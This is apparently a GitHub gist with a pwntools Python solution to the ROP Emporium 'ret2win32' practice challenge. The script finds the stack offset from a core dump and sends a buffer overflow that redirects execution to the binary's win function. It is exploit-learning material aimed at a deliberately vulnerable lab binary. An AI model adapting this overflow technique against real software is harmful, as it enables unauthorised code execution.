Created
March 28, 2018 20:57
-
-
Save kkirsche/1c6587898eadb4087e93fc6a3fa88319 to your computer and use it in GitHub Desktop.
ret2win32 ROP Emporium solution
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from pwn import * | |
| from os import remove | |
| # Prepare the binary | |
| context.update(binary='ret2win32', log_level='info') | |
| ret2win_binary = ELF('ret2win32') | |
| # Find our return address | |
| info('locating ret2win address') | |
| ret2win_addr = ret2win_binary.functions.ret2win.address | |
| info('ret2win function address at {a}'.format(a=hex(ret2win_addr))) | |
| eip_addr = p32(ret2win_addr) | |
| buf = cyclic(50) | |
| info('Starting process to location the value of EIP at the crash time') | |
| # Start the elf, and wait for it to be ready for input | |
| p = process(ret2win_binary.path) | |
| # Wait till the process is ready for our input | |
| p.recvuntil('> ') | |
| # Send our exploit | |
| p.sendline(buf) | |
| # Wait for the crash to occur | |
| p.wait() | |
| # The program should have crashed now | |
| info('Loading core dump to identify the cause of the crash') | |
| core = Coredump('core') | |
| eip_val = core.eip | |
| info('EIP contained {v} at the time of the crash'.format(v=hex(eip_val))) | |
| offset = cyclic_find(eip_val) | |
| info('EIP is located at offset {o}'.format(o=int(offset))) | |
| core = None | |
| info('Sending targeted exploit to process') | |
| exploit_buf = 'A'*offset + eip_addr + 'C'*(50-offset-len(eip_addr)) | |
| p = process(ret2win_binary.path) | |
| p.recvuntil('> ') | |
| p.sendline(exploit_buf) | |
| p.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment